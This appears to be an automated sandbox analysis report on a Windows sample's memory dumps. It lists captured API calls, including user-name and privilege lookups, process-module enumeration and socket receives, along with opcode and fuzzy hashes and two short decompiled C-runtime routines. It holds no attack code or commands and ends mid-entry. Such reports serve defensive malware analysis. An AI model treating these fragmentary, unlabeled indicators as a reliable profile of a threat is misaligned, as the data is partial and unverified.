                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        • Opcode ID: cbb70e1a464291b71cc238f17d4ebe94602c3c3342c8dab1cd0c9a67c6cfc487
                                                                                                                        • Instruction ID: 8ffa6bbeb7479f8e03b8881212467410918d2c3142b4af4e3ca6f2e759e027da
                                                                                                                        • Opcode Fuzzy Hash: cbb70e1a464291b71cc238f17d4ebe94602c3c3342c8dab1cd0c9a67c6cfc487
                                                                                                                        • Instruction Fuzzy Hash: AB2172715053815FD722CF29DC84B62BFB8EF46610F0884AAED85DB253D279E848CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA886
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1082081703-0
                                                                                                                        • Opcode ID: 455da53626548050fd3f2d4dfc2f7d2e40e247a271c7ee3df4c177cebd0db135
                                                                                                                        • Instruction ID: 83f855cc144ea2594564ea1cc46029128c014c1088fb9c4b82e61ed952373320
                                                                                                                        • Opcode Fuzzy Hash: 455da53626548050fd3f2d4dfc2f7d2e40e247a271c7ee3df4c177cebd0db135
                                                                                                                        • Instruction Fuzzy Hash: F111C471500700AFEB21CF69DC85BA6FBE8EF44720F04846AED45DB651D774A409CB71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BB70A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 6f17de3aa260c7312e14e5c475882d19d6dba556b5b7d9b323d992f588d43564
                                                                                                                        • Instruction ID: a81c06566bc0bc58137827ad4a6191b64d9064bb410d98b2da04fbfdb65d3c13
                                                                                                                        • Opcode Fuzzy Hash: 6f17de3aa260c7312e14e5c475882d19d6dba556b5b7d9b323d992f588d43564
                                                                                                                        • Instruction Fuzzy Hash: 3A219F324093809FDB228F65DC45A52BFB4EF06320F0988EAED858B163C275A418CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BBB4C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 560597551-0
                                                                                                                        • Opcode ID: 52159549bf102feaf2b7602cc875c41698a17b47aa6378bdc9dee587303d22e4
                                                                                                                        • Instruction ID: 857421109ab0da08244a2d99eb1be427940e7e7412c82f241e8d64ce363f3fa4
                                                                                                                        • Opcode Fuzzy Hash: 52159549bf102feaf2b7602cc875c41698a17b47aa6378bdc9dee587303d22e4
                                                                                                                        • Instruction Fuzzy Hash: D111C671514200AFEB21CF29EC86BB6FBD8EF44720F0484AAED45DB245E674A404CB71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000E30,?,?), ref: 012BAC2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        • Opcode ID: a59512e530b8eb44b5af425017a7735abd251b19fbd9d86f23fa171f0bd8f3a5
                                                                                                                        • Instruction ID: 157fed45cef98f740465d6c0eb8ee5845fa84c203eea0c08a12f05ec1224e25c
                                                                                                                        • Opcode Fuzzy Hash: a59512e530b8eb44b5af425017a7735abd251b19fbd9d86f23fa171f0bd8f3a5
                                                                                                                        • Instruction Fuzzy Hash: B011C4715093806FC311CB25CC45F62FFB8EF86620F09819FED884B692D225B915CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?,00000E30), ref: 012BAF93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: 022796f953c8793954d3f90408a0e159592254f98bdb133b8ae073a614e02bc3
                                                                                                                        • Instruction ID: ff5f2ffe4e1e0f4a97507b0d2c755102d59cf6d4eec65c39725e52c20d0bec53
                                                                                                                        • Opcode Fuzzy Hash: 022796f953c8793954d3f90408a0e159592254f98bdb133b8ae073a614e02bc3
                                                                                                                        • Instruction Fuzzy Hash: 1C110871510300AFEB21CB1ADC85FF6FBA8DF44720F148459EE459B2C1D6B5B544CAB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA290
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        • Opcode ID: d392e4cb82b797e8f9f993dd368d47a19053ce3a8250db12178b0df2243a40bc
                                                                                                                        • Instruction ID: 1e3e73842a2b98ee777e646e3955db69c2593230fd735d44b97cb575d729a840
                                                                                                                        • Opcode Fuzzy Hash: d392e4cb82b797e8f9f993dd368d47a19053ce3a8250db12178b0df2243a40bc
                                                                                                                        • Instruction Fuzzy Hash: 0611A3715093C0AFD7128F25DC95B92BFA4DF42220F0884EBED858F653D279A808CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        • Opcode ID: 284b74c9d91012cdecbda59494fcb61a497c7e8415605cdbdca4094733a72ee5
                                                                                                                        • Instruction ID: 22b2db327a0ed105c8b1e013941661bb9352ac019bf366973e14a91454a4f3be
                                                                                                                        • Opcode Fuzzy Hash: 284b74c9d91012cdecbda59494fcb61a497c7e8415605cdbdca4094733a72ee5
                                                                                                                        • Instruction Fuzzy Hash: 05118F71409780AFDB22CF15DC85B62FFB4EF46224F0884AAED858B153D275A418CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012BA3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        • Opcode ID: fe4cca4c283e8a2a20096d3841d1776fe0d95cef7afcebbc71d319f85b5d36cd
                                                                                                                        • Instruction ID: f1854dd1689022cf0c18382d80759b591941502fb3ab19cf8d9024499d06a12e
                                                                                                                        • Opcode Fuzzy Hash: fe4cca4c283e8a2a20096d3841d1776fe0d95cef7afcebbc71d319f85b5d36cd
                                                                                                                        • Instruction Fuzzy Hash: 361152716217418FDB20CF29DC857A6FBE8EF04760F08846ADD45DB242D6B5E444CA71
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E30,?,?), ref: 012BAA82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 514040917-0
                                                                                                                        • Opcode ID: 3d4a1db1bc5f0f6d6a5966563b6a6959bd1804f43729de352e7d7387f3498295
                                                                                                                        • Instruction ID: 3ebedf11452dc30c246345a05a0c0334c1e177e0f2f7e9fffdb174c987762a8e
                                                                                                                        • Opcode Fuzzy Hash: 3d4a1db1bc5f0f6d6a5966563b6a6959bd1804f43729de352e7d7387f3498295
                                                                                                                        • Instruction Fuzzy Hash: 54017171501600ABD710DF26DC86F36FBA8FB85B20F14816AED089B641E635F915CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CertGetCertificateChain.CRYPT32(?,00000E30,?,?), ref: 012BBC52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: CertCertificateChain
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3019455780-0
                                                                                                                        • Opcode ID: b6aee88368a068b365334a1b6ee9c356556d1238c78e76fd877474b225dd87e4
                                                                                                                        • Instruction ID: 0a61a50b094eab87ae679efa63fb5dcac7408ab51d5b0dd06a6fce8b9ae11640
                                                                                                                        • Opcode Fuzzy Hash: b6aee88368a068b365334a1b6ee9c356556d1238c78e76fd877474b225dd87e4
                                                                                                                        • Instruction Fuzzy Hash: E301B171500200ABD310DF26DC86B36FBA8FB84B20F14812AED089B641E635F915CBE5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindNextFileW.KERNEL32(?,00000E30,?,?), ref: 012BA1C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2029273394-0
                                                                                                                        • Opcode ID: 5576613bc31987a4c93946e34899076a6cbba23dcdf1b850f3fdbec4396428cc
                                                                                                                        • Instruction ID: f32f88873a19b2b9a1ad329217536e9a87e527df2cf3732a53064bdeb90f22f7
                                                                                                                        • Opcode Fuzzy Hash: 5576613bc31987a4c93946e34899076a6cbba23dcdf1b850f3fdbec4396428cc
                                                                                                                        • Instruction Fuzzy Hash: 6B017171501600ABD710DF26DC86B36FBA8FB85A20F14816AED089B641E635F915CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BB70A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 900bdba86a90a9f41b227edc3d83ce39e7f43158ab72d5006db907c20707be9e
                                                                                                                        • Instruction ID: 8080d8327cb18f646f4a52e74f2af51181f461984f09a1d261f65d1fdb0021b4
                                                                                                                        • Opcode Fuzzy Hash: 900bdba86a90a9f41b227edc3d83ce39e7f43158ab72d5006db907c20707be9e
                                                                                                                        • Instruction Fuzzy Hash: D7016D328107409FDB21CF55E885BA2FFE0EF48720F08C4AADE894B612D276E419DF61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MkParseDisplayName.OLE32(?,00000E30,?,?), ref: 012BB9FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DisplayNameParse
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580041360-0
                                                                                                                        • Opcode ID: a02535c6e6b6495c9ab0428a29d226f7960f021431e1d969d4b4babc0690ca06
                                                                                                                        • Instruction ID: d19d489f6bf85af7289a721b94a732a8cffe4709f00b24a22bd12ca57ea3f015
                                                                                                                        • Opcode Fuzzy Hash: a02535c6e6b6495c9ab0428a29d226f7960f021431e1d969d4b4babc0690ca06
                                                                                                                        • Instruction Fuzzy Hash: AE018B71500600ABD220DF1ADC86B22FBA8FB89B20F14811AED084B641E631F915CAA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA6B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        • Opcode ID: 6ed99f4842450d0f5f33456be162920bb05149e388504bc91e48bcf78a31e51d
                                                                                                                        • Instruction ID: eb6029aea2f35ed89d2cb1b1138555e823ee1b5a8b24fce3931647ec01c2136a
                                                                                                                        • Opcode Fuzzy Hash: 6ed99f4842450d0f5f33456be162920bb05149e388504bc91e48bcf78a31e51d
                                                                                                                        • Instruction Fuzzy Hash: 890184715143408FDB11CF29E8857A6FBA4EF40720F08C0AADD498B652D6B5A448CB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA290
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        • Opcode ID: 968659cfb3552df1b584210263f5db82bdea36641c586a86aef91c53f40e5fe9
                                                                                                                        • Instruction ID: 4887a1ca6555db56d129dcbba4b46ba28780c0bcf0599a76babfc9ef4bfdf04d
                                                                                                                        • Opcode Fuzzy Hash: 968659cfb3552df1b584210263f5db82bdea36641c586a86aef91c53f40e5fe9
                                                                                                                        • Instruction Fuzzy Hash: C101A7715143409FDB11CF59EC857A5FB94DF44320F08C4ABDD458F656D675A404CE61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,?,?), ref: 012BBEA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 833c20cbe4fecf13d74cea3e5b42489c27e17e821faaf8667f3a7aaf23fcf045
                                                                                                                        • Instruction ID: 2ac4bb3ef1b53b53ebfdae35294424004fd05e8b5549a8dfc781a60973833ef9
                                                                                                                        • Opcode Fuzzy Hash: 833c20cbe4fecf13d74cea3e5b42489c27e17e821faaf8667f3a7aaf23fcf045
                                                                                                                        • Instruction Fuzzy Hash: 0101AD71500600ABD320DF1ADC86F32FBA8FBC9B20F14811AED084B741E671F915CAE6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: closesocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2781271927-0
                                                                                                                        • Opcode ID: 77916ff73f732b4569885c337937a1e022bb13f50c5d6b8c8a0bbf2400175038
                                                                                                                        • Instruction ID: 4833fe2894b6c78317c92229890814fd194f73c3454b69d60c3d1c77806f1657
                                                                                                                        • Opcode Fuzzy Hash: 77916ff73f732b4569885c337937a1e022bb13f50c5d6b8c8a0bbf2400175038
                                                                                                                        • Instruction Fuzzy Hash: 5801D6708143408FDB10CF19EC857A2FFA0EF40320F08C4AADD498F216D2B9A408CAB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BB1A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 315c8ff9eedba135dcec06c629c292100d08a1effa823256fdf938ba14f38348
                                                                                                                        • Instruction ID: c87ed2f5edc7d8ca54544aff5c3351ca8eef08beb4661e8e2eb46fe87d9e793a
                                                                                                                        • Opcode Fuzzy Hash: 315c8ff9eedba135dcec06c629c292100d08a1effa823256fdf938ba14f38348
                                                                                                                        • Instruction Fuzzy Hash: 52F0A4345247449FDB21CF19E8857A1FFA0EF04720F08C4AADD454B252D2B5A544CAB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00410F5C(intOrPtr _a4) {
                                                                                                                        				void* _t6;
                                                                                                                        
                                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                        				 *0x42394c = _t6;
                                                                                                                        				if(_t6 != 0) {
                                                                                                                        					 *0x4253e0 = 1;
                                                                                                                        					return 1;
                                                                                                                        				} else {
                                                                                                                        					return _t6;
                                                                                                                        				}
                                                                                                                        			}




                                                                                                                        0x00410f71
                                                                                                                        0x00410f77
                                                                                                                        0x00410f7e
                                                                                                                        0x00410f85
                                                                                                                        0x00410f8b
                                                                                                                        0x00410f81
                                                                                                                        0x00410f81
                                                                                                                        0x00410f81

                                                                                                                        APIs
                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00410F71
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 10892065-0
                                                                                                                        • Opcode ID: 34255a6585fb3e331ced04b2c8a8200670835905ae4fee685044f194ccfd32eb
                                                                                                                        • Instruction ID: 7dbd7079291dcf911985dda31199901ab5e699221b2cb68c39fbbfd990ed0931
                                                                                                                        • Opcode Fuzzy Hash: 34255a6585fb3e331ced04b2c8a8200670835905ae4fee685044f194ccfd32eb
                                                                                                                        • Instruction Fuzzy Hash: 28D05E766943046EEB309F756C097A63BDCD78479AF408436BA0CC6150E6B4D681CA48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004135CE() {
                                                                                                                        				void* _t1;
                                                                                                                        
                                                                                                                        				_t1 = E0041355C(0); // executed
                                                                                                                        				return _t1;
                                                                                                                        			}




                                                                                                                        0x004135d0
                                                                                                                        0x004135d6

                                                                                                                        APIs
                                                                                                                        • __encode_pointer.LIBCMT ref: 004135D0
                                                                                                                          • Part of subcall function 0041355C: TlsGetValue.KERNEL32(00000000,?,004135D5,00000000,00416018,00423988,00000000,00000314,?,00411433,00423988,Microsoft Visual C++ Runtime Library,00012010), ref: 0041356E
                                                                                                                          • Part of subcall function 0041355C: TlsGetValue.KERNEL32(00000001,?,004135D5,00000000,00416018,00423988,00000000,00000314,?,00411433,00423988,Microsoft Visual C++ Runtime Library,00012010), ref: 00413585
                                                                                                                          • Part of subcall function 0041355C: RtlEncodePointer.NTDLL(00000000,?,004135D5,00000000,00416018,00423988,00000000,00000314,?,00411433,00423988,Microsoft Visual C++ Runtime Library,00012010), ref: 004135C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2585649348-0
                                                                                                                        • Opcode ID: de358d707f6dc5a45aa44d90a7c06924e6d7d19c201bc69f025c74145253c305
                                                                                                                        • Instruction ID: 5e2e2eaa0040ec8c7579bf8caa8b382c07b2c58f13b756867dbdf5b841412f2d
                                                                                                                        • Opcode Fuzzy Hash: de358d707f6dc5a45aa44d90a7c06924e6d7d19c201bc69f025c74145253c305
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: KDBM
                                                                                                                        • API String ID: 0-3504354710
                                                                                                                        • Opcode ID: 03d9632d225fb5d92547af875836440367be09fd83500fb0e469b281b50ebaa8
                                                                                                                        • Instruction ID: 0b10cc854460fbc1ea251e2939d4b6d6bab149de0633d1c27d14635b2dbbf2f1
                                                                                                                        • Opcode Fuzzy Hash: 03d9632d225fb5d92547af875836440367be09fd83500fb0e469b281b50ebaa8
                                                                                                                        • Instruction Fuzzy Hash: BA812770A1034ACFC724EBB8F44CAAD7FAAFF88304F108559D64587258DF796946CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: KDBM
                                                                                                                        • API String ID: 0-3504354710
                                                                                                                        • Opcode ID: 8263a3c4390932c7ed8b1dc7a92a17f2c7120570dbd772d06683264b6d6d8eb5
                                                                                                                        • Instruction ID: bc35fc2e377020cb86632b204304a9d88610a6431cb7ce992e344d45691ac888
                                                                                                                        • Opcode Fuzzy Hash: 8263a3c4390932c7ed8b1dc7a92a17f2c7120570dbd772d06683264b6d6d8eb5
                                                                                                                        • Instruction Fuzzy Hash: D1711670A1024ACFC724EBB8F44CAAE7FAAFF88304F108558D64587258DF756946CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 636624b0538fdca69bcfc2a013ab5d68ffff9e585392f82546f9c79ded03cec5
                                                                                                                        • Instruction ID: 07921bbd5da93a04d2939ce6c23440f10a5a257bf92eb3d7ee57f711c9c5f4a1
                                                                                                                        • Opcode Fuzzy Hash: 636624b0538fdca69bcfc2a013ab5d68ffff9e585392f82546f9c79ded03cec5
                                                                                                                        • Instruction Fuzzy Hash: DA320431B002468FCB15AB78C8546AEBBF6EFC9304F1584AAD505DB3A6DE35DC42CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d50342697ac54538414e487c85cbf5119650b1798f94de23eade4a13f456dc6a
                                                                                                                        • Instruction ID: 17e9a1ef04eb3608a924d6293615cea7cc4d3d96bbb3d7b517238ba3e068d36b
                                                                                                                        • Opcode Fuzzy Hash: d50342697ac54538414e487c85cbf5119650b1798f94de23eade4a13f456dc6a
                                                                                                                        • Instruction Fuzzy Hash: C5A12634B002049FCB18EFB4D598AADBBF2EF88311F158569E906E7394DB359D46CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a838f4f633592d012242ae9b0a6b5223bf9f6a05dca625d3acaad94aa4a2df4
                                                                                                                        • Instruction ID: 1db23b5fd15de4087333eafdcc8c4a599fd08d9455de610229151c8be9395000
                                                                                                                        • Opcode Fuzzy Hash: 6a838f4f633592d012242ae9b0a6b5223bf9f6a05dca625d3acaad94aa4a2df4
                                                                                                                        • Instruction Fuzzy Hash: 0B02D230B502458FDB29FB78E46837DBBA2AF89300F54896DD9469B394DF359C01C792
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616715619.00000000015A0000.00000040.00000040.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a24b35f2f6b3b087499a2211ed3f6bd09d136f2be7ba323c72dc923876ba0904
                                                                                                                        • Instruction ID: aebf088fc55232757dca9a4f3f9aec3f53f64bcb12ced9624cfdd87b36e4b3e0
                                                                                                                        • Opcode Fuzzy Hash: a24b35f2f6b3b087499a2211ed3f6bd09d136f2be7ba323c72dc923876ba0904
                                                                                                                        • Instruction Fuzzy Hash: 8E41BC6254E3C15FD7038B349C645A1BFB4AE43224B1E82EBD8C5CF5A3E22D584AC772
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ecaaaaf75341de972e5df2aa6275150b06c8d27176306c0cb2879239088d79cb
                                                                                                                        • Instruction ID: d1009248d53fc3d24f529b6473553725ab8b20abe5463c49bd899ba198de1ba3
                                                                                                                        • Opcode Fuzzy Hash: ecaaaaf75341de972e5df2aa6275150b06c8d27176306c0cb2879239088d79cb
                                                                                                                        • Instruction Fuzzy Hash: 81813E34B002059FCB149FB8D458AAEBBF2BF88301F158469E906EB3A9DF759C45CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcb26c7c250810a40a65623bce7f76949d0c841a634db4fc143433f72611ca7a
                                                                                                                        • Instruction ID: a539b956ddff56700ec0e1550024e3c1f0d64a916b4a75f339a6c226f5a80a2f
                                                                                                                        • Opcode Fuzzy Hash: fcb26c7c250810a40a65623bce7f76949d0c841a634db4fc143433f72611ca7a
                                                                                                                        • Instruction Fuzzy Hash: 66615075A00118AFDB15EF98D984ADEFBB2FF88310F148459EA05A7354DB31ED11CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 625b2a003d40cee97eda0936a978e0c63a853062839c1b595a6bee4c39679008
                                                                                                                        • Instruction ID: 80e4da321d274983af866b1bb5a8cb9a2106129ec522a3252140b5ec67bdf303
